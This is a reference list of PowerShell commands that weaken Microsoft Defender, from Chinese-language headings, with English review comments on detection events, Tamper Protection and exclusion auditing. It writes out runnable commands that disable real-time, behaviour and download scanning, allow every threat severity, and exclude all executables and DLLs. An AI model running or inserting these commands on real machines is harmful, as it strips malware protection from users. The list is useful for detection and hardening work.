# NOTE(review): reference list of Set-MpPreference / Add-MpPreference calls that weaken
# Microsoft Defender (ATT&CK T1562.001, Impair Defenses). From the defender's side every
# entry is a configuration change that Defender itself logs in the
# Microsoft-Windows-Windows Defender/Operational channel (event 5007 for a preference change,
# 5001 when real-time protection is turned off), and the real-time / behavior / IOAV
# changes are rejected while Tamper Protection is enabled — keeping it on is the primary
# mitigation for everything below.
Windows Defender功能削弱
# Turn off real-time protection
# NOTE(review): the next line was collapsed during extraction; it holds six separate
# comment/command pairs (behavior monitoring, IOAV protection, signature update on startup,
# archive scanning, intrusion prevention) on one physical line.
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true" # 关闭行为监视 powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true" # 禁用IOAV保护,禁止扫描下载的文件和附件 powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true" # 关闭Defender自动更新 powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true" # 禁止扫描.zip等的存档文件 powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true" # 关闭已知漏洞利用防护 powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
Defender威胁忽视
# Do not submit samples to Microsoft
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
# Default automatic remediation action for high-severity threats
# NOTE(review): the page sets 6 for every severity level; in the cmdlet's documented
# ThreatAction enumeration that value appears to be "Allow" (no remediation) — confirm
# against Get-Help Set-MpPreference, and audit Get-MpPreference output for it.
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
# Default automatic remediation action for moderate-severity threats
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
# Default automatic remediation action for low-severity threats
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
# Default automatic remediation action for severe threats
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
Defender检测扩展排除
# NOTE(review): excluding the .exe extension exempts every executable from scanning;
# exclusion lists this broad are worth alerting on in a Get-MpPreference baseline diff.
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
Defender检测进程排除
# NOTE(review): the bare-extension and wildcard entries (".exe", "*.dll", "*.exe") below
# effectively cover every process, not just the named ones; treat any wildcard in
# ExclusionProcess / ExclusionExtension as a finding when reviewing a host.
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32*""
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
powershell.exe -command "Add-MpPreference -ExclusionProcess "*.dll""
powershell.exe -command "Add-MpPreference -ExclusionProcess "*.exe""
禁止向微软报告安全信息
# Turn off MAPS (cloud-delivered protection) reporting to Microsoft
cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"
保护关闭
# Turn off potentially-unwanted-application (PUA) protection
powershell.exe -command "Set-MpPreference -PUAProtection disable"
攻击面减少
# Turn off controlled folder access (ransomware protection for protected folders)
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
参考资料: